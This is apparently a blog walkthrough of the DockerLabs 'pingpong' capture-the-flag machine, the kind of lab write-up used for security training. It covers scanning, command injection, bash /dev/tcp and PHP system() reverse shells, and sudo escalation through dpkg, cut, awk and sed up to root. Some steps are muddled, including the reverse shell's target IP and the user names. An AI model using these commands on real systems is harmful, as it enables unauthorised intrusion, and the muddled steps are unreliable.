PINGPONG DOCKERLABS

 PINGPONG


First of all, let’s go to resolve the pingpong cyber lab in the dockerlabs platform.
We have to execute the machine with the command which you can see below.

──(luis㉿kali)-[~/Descargas/pingpong]

└─$ sudo bash auto_deploy.sh pingpong.tar

[sudo] contraseña para luis:


                       ##       .        

                 ## ## ##      ==        

              ## ## ## ##     ===        

          /""""""""""""""""\___/ ===      

     ~~~ {~~ ~~~~ ~~~ ~~~~ ~~ ~ / ===- ~~~

          \______ o         __/          

            \   \       __/           

             \____\______/              

                                         

 ___ ____ ____ _ _ ____ ____ _   ____ ___ ____

 | \ | | |   |_/ |___ |__/ |   |__| |__] [__ 

 |__/ |__| |___ | \_ |___ | \ |___ | | |__] ___]

                                                            

Estamos desplegando la máquina vulnerable, espere un momento.

Máquina desplegada, su dirección IP es --> 172.17.0.2

Presiona Ctrl+C cuando termines con la máquina para eliminarla

Now as the machine are deploy, we have to execute ports can thus we need to discover hidden ports which are:
  1. port 80(HTTP)
  2. port 5000(UPNP)
  3. port 443(HTTPS)

┌──(root㉿kali)-[/home/luis/Descargas/pingpong]

└─# nmap -n -Pn -p- --min-rate 5000 -sC 172.17.0.2 -vvv

Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-11 18:48 CEST

NSE: Loaded 126 scripts for scanning.

NSE: Script Pre-scanning.

NSE: Starting runlevel 1 (of 2) scan.

Initiating NSE at 18:48

Completed NSE at 18:48, 0.00s elapsed

NSE: Starting runlevel 2 (of 2) scan.

Initiating NSE at 18:48

Completed NSE at 18:48, 0.00s elapsed

Initiating ARP Ping Scan at 18:48

Scanning 172.17.0.2 [1 port]

Completed ARP Ping Scan at 18:48, 0.09s elapsed (1 total hosts)

Initiating SYN Stealth Scan at 18:48

Scanning 172.17.0.2 [65535 ports]

Discovered open port 80/tcp on 172.17.0.2

Discovered open port 443/tcp on 172.17.0.2

Discovered open port 5000/tcp on 172.17.0.2

Completed SYN Stealth Scan at 18:48, 0.93s elapsed (65535 total ports)

NSE: Script scanning 172.17.0.2.

NSE: Starting runlevel 1 (of 2) scan.

Initiating NSE at 18:48

Completed NSE at 18:48, 1.85s elapsed

NSE: Starting runlevel 2 (of 2) scan.

Initiating NSE at 18:48

Completed NSE at 18:48, 0.00s elapsed

Nmap scan report for 172.17.0.2

Host is up, received arp-response (0.0000050s latency).

Scanned at 2025-08-11 18:48:29 CEST for 3s

Not shown: 65532 closed tcp ports (reset)

PORT    STATE SERVICE REASON

80/tcp  open http   syn-ack ttl 64

| http-methods:

|_ Supported Methods: OPTIONS HEAD GET POST

|_http-title: Apache2 Ubuntu Default Page: It works

443/tcp open https  syn-ack ttl 64

| http-methods:

|_ Supported Methods: OPTIONS HEAD GET POST

|_ssl-date: TLS randomness does not represent time

|_http-title: Apache2 Ubuntu Default Page: It works

| tls-alpn:

|_ http/1.1

| ssl-cert: Subject: commonName=example.com/organizationName=Your Organization/stateOrProvinceName=California/countryName=US/localityName=San Francisco/organizationalUnitName=Your Unit

| Issuer: commonName=example.com/organizationName=Your Organization/stateOrProvinceName=California/countryName=US/localityName=San Francisco/organizationalUnitName=Your Unit

| Public Key type: rsa

| Public Key bits: 2048

| Signature Algorithm: sha256WithRSAEncryption

| Not valid before: 2024-05-19T14:20:49

| Not valid after: 2025-05-19T14:20:49

| MD5:  9ba4:3106:4c16:47c8:dc44:cc43:9e96:b3d0

| SHA-1: 5c55:1ab3:9e32:5498:c454:8eb9:e203:a46a:8e7f:bd18

| -----BEGIN CERTIFICATE-----

| MIID4zCCAsugAwIBAgIULigYxnihUEciHsadhZIVB1bHlvowDQYJKoZIhvcNAQEL

| BQAwgYAxCzAJBgNVBAYTAlVTMRMwEQYDVQQIDApDYWxpZm9ybmlhMRYwFAYDVQQH

| DA1TYW4gRnJhbmNpc2NvMRowGAYDVQQKDBFZb3VyIE9yZ2FuaXphdGlvbjESMBAG

| A1UECwwJWW91ciBVbml0MRQwEgYDVQQDDAtleGFtcGxlLmNvbTAeFw0yNDA1MTkx

| NDIwNDlaFw0yNTA1MTkxNDIwNDlaMIGAMQswCQYDVQQGEwJVUzETMBEGA1UECAwK

| Q2FsaWZvcm5pYTEWMBQGA1UEBwwNU2FuIEZyYW5jaXNjbzEaMBgGA1UECgwRWW91

| ciBPcmdhbml6YXRpb24xEjAQBgNVBAsMCVlvdXIgVW5pdDEUMBIGA1UEAwwLZXhh

| bXBsZS5jb20wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDEqLvUG75u

| /h+CCctOKN+mdmVrGB7kj622+bMKv1Nb0tWOkxGJfeTpmofz2F7wYP4G+mgkolsj

| e3Nhzbhuw7jzhHEXTkjaeJdVstODXfr2SO3hzGTFJNf4QAJdidzywO415C6pv/ri

| mZdwBuVTMXRkH/Blz6wInPTx6lPKrHFWmaYnvroa+FyUNFqZpxlKIp/8Ztyi8rQ3

| DOyRGvKD850XJDCtoN8bXBOjNa8aarzC5CM4SJY78WrGYzysrXSrZBQP8ztJnmCN

| gkurONPKidA9q4DbYGzDUrXP2wyPLMgvlwN7hoPDGhldwn6oHJfiMambrOqiNd02

| +4G46l6HNO8bAgMBAAGjUzBRMB0GA1UdDgQWBBRskdiM67+xLIfhKFUDsRTW2iuY

| yzAfBgNVHSMEGDAWgBRskdiM67+xLIfhKFUDsRTW2iuYyzAPBgNVHRMBAf8EBTAD

| AQH/MA0GCSqGSIb3DQEBCwUAA4IBAQAorD07Oh+lrObtJY1cRyMDUdSVzWXqc5C1

| ezcGUsBaRTkbgHNpiAE71aXW6izz+AdFuiadOtJUIZHBbQ4YhrHPGabTeobtSc2W

| 7wg8s7n/PyDVNxPjx6EyNYvANfnQNFSrX4g+Z4ovEmhZP/YiT3L4ChTaB0rkLhmK

| E9aytIGKrh0OqhYD4mZrqCfXcUHpNgRfJQhjCjGdFte4PoPT+nPgua3Hp38sUnGX

| +qrYDZI52+OO6ChEE6Miguz9ji+YdbnPZwpV2mWR2+BWjOgQ5QnSBeorXLjfnLQn

| /a9ezvNvIke18R0FR0AO9/3RX73To5+vo5Bx+fXiREKStlDvh39v

|_-----END CERTIFICATE-----

5000/tcp open upnp   syn-ack ttl 64

MAC Address: 02:42:AC:11:00:02 (Unknown)

NSE: Script Post-scanning.

NSE: Starting runlevel 1 (of 2) scan.

Initiating NSE at 18:48

Completed NSE at 18:48, 0.01s elapsed

NSE: Starting runlevel 2 (of 2) scan.

Initiating NSE at 18:48

Completed NSE at 18:48, 0.00s elapsed

Read data files from: /usr/share/nmap

Nmap done: 1 IP address (1 host up) scanned in 3.35 seconds

          Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)                                                                                                                                                                                       

In addition, we have to execute the scrawling scan with the command which you can see below, and we have discovered this file in the port 80:

  1. ./php        
  2. /javascript
  3. /machine.php                                                                                                                

┌──(root㉿kali)-[/home/luis/Descargas]

└─# gobuster dir -u "http://172.17.0.2:80/" -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,tar,back

===============================================================

Gobuster v3.6

by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

===============================================================

[+] Url:                    http://172.17.0.2:80/

[+] Method:                 GET

[+] Threads:                10

[+] Wordlist:               /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt

[+] Negative Status codes:  404

[+] User Agent:             gobuster/3.6

[+] Extensions:             back,php,txt,tar

[+] Timeout:                10s

===============================================================

Starting gobuster in directory enumeration mode

===============================================================

/.php                (Status: 403) [Size: 275]

/javascript          (Status: 301) [Size: 313] [--> http://172.17.0.2/javascript/]

/machine.php         (Status: 200) [Size: 6989]

Progress: 192760 / 1102800 (17.48%)                                                                                       /.php                (Status: 403) [Size: 275]

/server-status       (Status: 403) [Size: 275]

Progress: 777273 / 1102800 (70.48%)                                                                                       Progress: 1102795 / 1102800 (100.00%)

===============================================================

Finished

===============================================================

Now, as we know there is a webpage in port 5000 let´s go the next steps as you can see in the pictures below:

  1. We have discover a interactive control panel
  2. We should write ip which is local IP ADDRESS
  3. We should write ip which is local IP ADDRESS and ; whoami and we have dicovered the vulnerability



Now, we have to create a reverse shell an we can use this webpage which is this you can see in the next pictures below: https://www.revshells.com/.



Now as we have discovered the vulnerability which is RCE we should get reverse shell with this steps:

  1. execute the reverse shell which is, bash -c ‘bash - i >& /dev/tcp/172.17.0.2/443 >& 1
  2. we should get listening port as you can see below
  3. of all has been done correctly, we should be able to get reverse shell in our attacker machine as you can see below

┌──(root㉿kali)-[/home/luis/Descargas/pingpong]

└─# nc -lvp 443

listening on [any] 443 ...

172.17.0.2: inverse host lookup failed: Unknown host

connect to [172.17.0.1] from (UNKNOWN) [172.17.0.2] 36574

bash: cannot set terminal process group (33): Inappropriate ioctl for device

bash: no job control in this shell

Now, we must execute the next commands to create persistence in the machine you can see below which are:

  1. script /dev/null -c bash
  2.  ^Z
  3. stty raw -echo;fg 
  4. reset xterm
  5. export TERM=xterm
  6. export SHELL=BASH

freddy@bdb0281c8b6c:~$ export TERM=xterm

freddy@bdb0281c8b6c:~$ script /dev/null -c bash

script /dev/null -c bash

Script started, output log file is '/dev/null'.

freddy@bdb0281c8b6c:~$ ^Z

zsh: suspended nc -lvp 443                                                                

┌──(root㉿kali)-[/home/luis/Descargas/pingpong]

└─# stty raw -echo;fg             

[1] + continued nc -lvp 443

                            reset xterm

freddy@bdb0281c8b6c:~$ export SHELL=BASH

freddy@bdb0281c8b6c:~$ export TERM=xterm

freddy@bdb0281c8b6c:~$ sudo -l

Now let’s go to privilege scalation where we must execute this command which is sudo -l and then we will see if it’s possible pivoting to other users, as you can see below.

Matching Defaults entries for freddy on bdb0281c8b6c:

   env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,

   use_pty

User freddy may run the following commands on bdb0281c8b6c:

   (bobby) NOPASSWD: /usr/bin/dpkg

In addition, we have to search in google the https://gtfobins.github.io/gtfobins/dpkg/#su and we should be able to obtain pivoting to other user as you can see below with this command which is:

  1. sudo -u Bobby dpkg -l

freddy@bdb0281c8b6c:~$ sudo -u bobby dpkg -l

Desired=Unknown/Install/Remove/Purge/Hold

| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend

|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)

||/ Name                           Version                          Architectu

re Description

+++-===============================-=================================-==========

==-=============================================================================

===

ii adduser                        3.137ubuntu1                     all      

  add and remove users and groups

ii apache2                        2.4.58-1ubuntu8.1                amd64    

  Apache HTTP Server

ii apache2-bin                    2.4.58-1ubuntu8.1                amd64    

  Apache HTTP Server (modules and other binary files)

ii apache2-data                   2.4.58-1ubuntu8.1                all      

  Apache HTTP Server (common files)

ii apache2-utils                  2.4.58-1ubuntu8.1                amd64    

  Apache HTTP Server (utility programs for web servers)

ii apt                            2.7.14build2                     amd64    

  commandline package manager

ii base-files                     13ubuntu10                       amd64    

  Debian base system miscellaneous files

ii base-passwd                    3.6.3build1                      amd64

Right now! we must execute this command which is ! /bin/bash, where we will be able to get pivoting to other user.

! /bin/bash

Now, we must execute the same command before which is sudo -l and then we will should execute the reverse shell and we will obtain the next user which is bobby as you can see below.

bobby@bdb0281c8b6c:/home/freddy$ sudo -l

Matching Defaults entries for bobby on bdb0281c8b6c:

   env_reset, mail_badpass,

secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,

   use_pty

User bobby may run the following commands on bdb0281c8b6c:

   (gladys) NOPASSWD: /usr/bin/php

bobby@bdb0281c8b6c:/home/freddy$

┌──(luis㉿kali)-[~/Descargas/pingpong]

└─$ nc -lvnp 4444

listening on [any] 4444 ...

bobby@bdb0281c8b6c:/home/freddy$ CMD="/bin/bash -c \'bash -i >& /dev/tcp/172.17.0.2/4444 0>&1\'"

sudo -u gladys php -r "system('$CMD');"

gladys@bdb0281c8b6c:/home/freddy$ sudo -l

Matching Defaults entries for gladys on bdb0281c8b6c:

   env_reset, mail_badpass,

   secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,

   use_pty

User gladys may run the following commands on bdb0281c8b6c:

Now, we must execute the same command before which is sudo -l and then we will should execute LFILE=/opt/chocolatitocontraseña.txt in the path /opt and we will obtain the next user which is chocolatito as you can see below and then we should execute sudo -u chocolatito cut -d "" -f1 "$LFILE" where we have got password which is chocolatitopassword.

   (chocolatito) NOPASSWD: /usr/bin/cut

gladys@bdb0281c8b6c:/home/freddy$ ls

ls: cannot open directory '.': Permission denied

gladys@bdb0281c8b6c:/home/freddy$ cd ..

gladys@bdb0281c8b6c:/home$ ls

bobby chocolatito freddy gladys theboss ubuntu

gladys@bdb0281c8b6c:/home$ cd gladys/

gladys@bdb0281c8b6c:~$ ls

Desktop Documents Downloads Music Pictures Public Templates Videos

gladys@bdb0281c8b6c:~$ cd ..

gladys@bdb0281c8b6c:/home$ ls

bobby chocolatito freddy gladys theboss ubuntu

gladys@bdb0281c8b6c:/home$ cd /

gladys@bdb0281c8b6c:/$ ls

bin  dev home lib.usr-is-merged media opt  root sbin sys usr

boot etc lib  lib64             mnt   proc run  srv  tmp var

gladys@bdb0281c8b6c:/$ cd /opt/

gladys@bdb0281c8b6c:/opt$ ls

chocolatitocontraseña.txt

gladys@bdb0281c8b6c:/opt$

gladys@bdb0281c8b6c:/opt$ cat chocolatitocontraseña.txt

cat: chocolatitocontraseña.txt: Permission denied

gladys@bdb0281c8b6c:/opt$ LFILE=/opt/chocolatitocontraseña.txt

gladys@bdb0281c8b6c:/opt$ sudo -u chocolatito cut -d "" -f1 "$LFILE"

chocolatitopassword

gladys@bdb0281c8b6c:/opt$ su chocolatito

Password:

chocolatito@bdb0281c8b6c:/opt$ sudo -l

Matching Defaults entries for chocolatito on bdb0281c8b6c:

   env_reset, mail_badpass,

   secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,

   use_pty

Now, we must execute the same command before which is sudo -l and then we will should execute sudo -u theboss awk 'BEGIN {system("/bin/sh")}' bash -p and we will obtain the next user which is chocolatito as you can see below.

User chocolatito may run the following commands on bdb0281c8b6c:

 (theboss) NOPASSWD: /usr/bin/awk

chocolatito@bdb0281c8b6c:/opt$

chocolatito@bdb0281c8b6c:/opt$ sudo -l

Matching Defaults entries for chocolatito on bdb0281c8b6c:

   env_reset, mail_badpass,

secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,

   use_pty

User chocolatito may run the following commands on bdb0281c8b6c:

chocolatito@bdb0281c8b6c:/opt$ sudo -u theboss awk 'BEGIN {system("/bin/sh")}'

$ bash -p

theboss@bdb0281c8b6c:/opt$ sudo -l

Matching Defaults entries for theboss on bdb0281c8b6c:

   env_reset, mail_badpass,

secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,

   use_pty

Now, we must execute the same command before which is sudo -l and then we will should execute sudo sed -n '1e exec sh 1>&0' /etc/hosts and we will obtain the next user which is root as you can see below.

User theboss may run the following commands on bdb0281c8b6c:

   (root) NOPASSWD: /usr/bin/sed

theboss@bdb0281c8b6c:/opt$

chocolatito@bdb0281c8b6c:/opt$ sudo -l

Matching Defaults entries for chocolatito on bdb0281c8b6c:

   env_reset, mail_badpass,

secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bi

User theboss may run the following commands on bdb0281c8b6c:

 (root) NOPASSWD: /usr/bin/sed

theboss@bdb0281c8b6c:/opt$ sudo sed -n '1e exec sh 1>&0' /etc/hosts

# bash -p

root@bdb0281c8b6c:/opt#

I hope you liked and learned something new

This article has been done with ethical proposes

Good Hack

Comments

Post a Comment

Entradas Populares

INTERNAL

Image
 INTERNAL(TRYHACKME) First of all, let's go execute nmap command to identify alives ports and version with this host 192.168.88.6 as you can see below. Key open ports and services include: Web Servers: Port 80 (HTTP):  Running  Apache2 Ubuntu Default Page . It supports  OPTIONS ,  TRACE  (flagged as potentially risky),  GET ,  HEAD , and  POST  methods. The webpage title is " INTERNAL ". SSH Protocol Port 22 (SSH): Running Linux . ┌──(root㉿kali)-[/home/luis/Descargas] └─# nmap -n -Pn -p- --min-rate 5000 -sC 10.10.216.78 -vvv Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-07 12:06 CEST NSE: Loaded 126 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 2) scan. Initiating NSE at 12:06 Completed NSE at 12:06, 0.00s elapsed NSE: Starting runlevel 2 (of 2) scan. Initiating NSE at 12:06 Completed NSE at 12:06, 0.00s elapsed Initiating SYN Stealth Scan at 12:06 Scanning 10.10.216.78 [65535 ports] Discove...
Read more »

TOR WEB BROWSER

Image
  TOR WEB BROWSER TOR INSTALLATION First of all; we're going to this link from the oficial webpage: https://www.torproject.org/es/download/   where we have to download this version our laptop, Windows and Linux but in my case I've had to download for Windows 10. When the program is installed we will press execute and we'll follow step by step:   We'll open and we'll see this image where you have to select the language and select ok to continue the instal l ation. In addition, we'll select the location wherever you want install the program, but in my case I prefer the default location and you'll able to select wherever you want. Now, we will be started the installation process and when it finished you will be able to see the picture below: TOR CONNECT If the process has been successful, you will be able to connect with the connect button which you can observe in both pictures below: ADD A BRIDGE ...
Read more »

activedirectory

Image
ACTIVEDIRECTORY (TRYHACKME) First of all, let’s go to execute nmap toolkit and we'll be able to start the enumeration of the ports as you can see below with this command: sudo nmap -n -Pn -p- --min-rate 5000 10.10.135.154 -vvv -sC -sV This revealed several open TCP ports with associated services, including: DNS (53),  HTTP  (80),  Kerberos (88),  RPC (135),  NetBIOS-SSN (139),  SMB (445),  RDP (3389),  WS-Management (5985)  LDAP (389, 636, 3268, 3269) Moreover, service and NSE script detection provided valuable information about the services running on these ports, such as IIS 10.0, Microsoft Windows Kerberos , Active Directory LDAP , and Microsoft Terminal Services . The SSL/TLS certificate information on port 3389 indicated the common name AttacktiveDirectory.spookysec.local, reinforcing the target as an Active Directory server. rdp-ntlm-info also provided details about the domain (THM-AD) and computer name (ATTACKTIVEDIREC) as you can se...
Read more »

PICKLE RICK

Image
  PICKLE RICK I'm going to realize the resolution of the machine Level Easy from Tryhackme called  Pickle Rick  which is a machine so easy to realize. First of all,  we can observe that in the picture bellow we have some inforamtion and I'm going to execute control +u  and we can see in the second picture below that we've obtained a  Username. I'm going to gathering information about machine and I have to enter in the Linux terminal and I must introduce this command which you canobserve in the picture below:   gobuster dir -u(url) http://10.10.99.188/ -w(password dictionary)  /usr/share/wordlist/dirb/common.txt -x (formato que quereos que busque) .txt*, .php, .login,  In this case, we can observe that scan has discovered this 4 webpages: /assests /denied.php /index.html /login.php /robots.txt Now, we can see such as the web page from /robots.txt   it seems the password in the picture below. Now, we've discovered this login web page...
Read more »

Metasploit Framework

Image
 METASPLOIT FRAMEWORK USE TO  AUXILIARY MODULE FROM METASPLOIT First of all, I have used the auxiliary modules from Metasploit-Framework which could allow me Scanning, see ports, SO version, vulnerability in applications etc, where you can see at the bottom of the picture if  I use this module whose name is: auxiliary/scanner/discovery/arp_sweep  (To verify the IPs listening in the network) Now, we can observe that when I have selected in the auxiliary module I have had to do this set up  that we can observe in the second page below: INTERFACE : This I've set up the network interface that in my case is the eth0 interface. RHOSTS :This I've set up the IP Address which I am finding out that in my case is 192.168.100.0/24 (all the IP Address from network that could be possible which I am analyzing). THREADS : Are the threads; it's the fast  that I want to analyze the IP Addresses but in my case there are 15 threads because I want to analize as fast as possible...
Read more »

HOSTING

Image
HOSTING First of all, let's go to hosting machine from active directory, for it  using arp-scan to discover active hosts on the local network, identifying 192.168.88.8 as you can see in below. ┌──(kali㉿kali)-[~] └─$ sudo arp-scan -I eth0 --localnet Interface: eth0, type: EN10MB, MAC: 08:00:27:43:73:bc, IPv4: 192.168.88.5 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.88.1 d8:44:89:50:2d:a3 (Unknown) 192.168.88.8 08:00:27:98:d4:bf PCS Systemtechnik GmbH 192.168.88.9 00:e0:4c:69:66:4a REALTEK SEMICONDUCTOR CORP. 3 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 2.075 seconds (123.37 hosts/sec). 3 responded ┌──(kali㉿kali)-[~] └─$ ping -c1 192.168.88.8 PING 192.168.88.8 (192.168.88.8) 56(84) bytes of data. 64 bytes from 192.168.88.8: icmp_seq=1 ttl=128...
Read more »

LOVE

Image
BUSCALOVE First of all, I am going to do this machine from cybersecurity labs called BuscaLove which is easy Level. For it, let’s go to open Linux terminal and we have to write the command when we can see in the picture below. cd Descargas In addition, we have to depress the unzip file whose name’s buscalove.zip you can see in the picture below. Now we have to deploy the vulnerability machine whose command is sudo bash auto_deploy.sh buscalove.tar we can see in the picture below. On the other hand, to start the attack at virtual machine, we must verify if the attacker machine is in the same range of IP Address and we have to introduce this command which is ping -c 3 172.18.0.2 we can see in the picture below. As I,ve just seen the IP Address it’s in the same range of my IP Address we have to introduce the command with nmap tool which is nmap -n -Pn 172.18.0.2 -p- - -min-rate 4000 -vvv( here you can see in this picture the scanner) but I’ve got it 2 ports: 22: open ssh 80: open http No...
Read more »

CHANGE MACHINE

Image
CHANGE  First of all, let's go to hosting machine from active directory, for it  using  arp-scan  to discover active hosts on the local network, identifying  192.168.88.8   as you can see in below . ┌──(root㉿kali)-[/home/luis] └─# arp-scan -I eth0 --localnet Interface: eth0, type: EN10MB, MAC: 08:00:27:4d:8a:0f, IPv4: 192.168.88.6 WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.88.1 d8:44:89:50:2d:a3 (Unknown) 192.168.88.4 00:e0:4c:97:01:a7 (Unknown) 192.168.88.5 00:d8:61:fa:c0:4a (Unknown) 192.168.88.7 08:00:27:b1:ae:9f (Unknown) 4 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 1.848 seconds (138.53 hosts/sec). 4 responded Now, let's go execute nmap command to identify alives ports and version with this host  192.168.88...
Read more »